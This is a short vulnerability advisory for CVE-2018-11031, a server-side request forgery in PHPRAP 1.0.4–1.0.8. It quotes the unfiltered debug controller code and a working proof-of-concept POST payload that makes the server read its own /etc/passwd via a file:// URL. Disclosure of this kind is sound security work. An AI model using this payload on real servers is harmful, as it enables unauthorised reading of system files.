PHPRAP 1.0.4 -1.0.8 CVE-2018-11031 – Server-side Request Forge

Authors:FortuneC00kie            Risk:High

CVE:CVE-2018-11031              0day:Server-side Request Forge

0day -id:0DAY-176179             Date:2018-05-14

Description

application/home/controller/debug.php in PHPRAP 1.0.4 through 1.0.8 has SSRF via the /debug URI, as demonstrated by an api[url]=file:////etc/passwd&api[method]=get POST request.

Analysis

file: application/home/controller/debug.php 11line

class debug extends controller {

    // Get interface id
    public function index()
    {
        $api     = request::post('api', []);
        $request = request::post('request', []);

        if(!$url = $api['url']){

            response::ajax(['code'=> 300, 'msg' => 'Request address does not exist']);

        }

        if(!$method = $api['method']){

            response::ajax(['code'=> 300, 'msg' => 'Request address does not exist']);

        }

        $data = [];

        foreach ($request as $k=>$v){
            foreach ($v as $k1=>$v1){
                $data[$request['key'][$k1]] = $v1;
            }
        }

        $curl = new curl($url, $method, $data);

This method does not restrict the http request of the intranet address, it can cause SSRF attack
For example, the following request

url: http://www.xxxxxx.com/debug
post: api[url]=file:////etc/passwd&api[method]=get

You can see that the server returned the contents of the /etc/passwd

Leave a Reply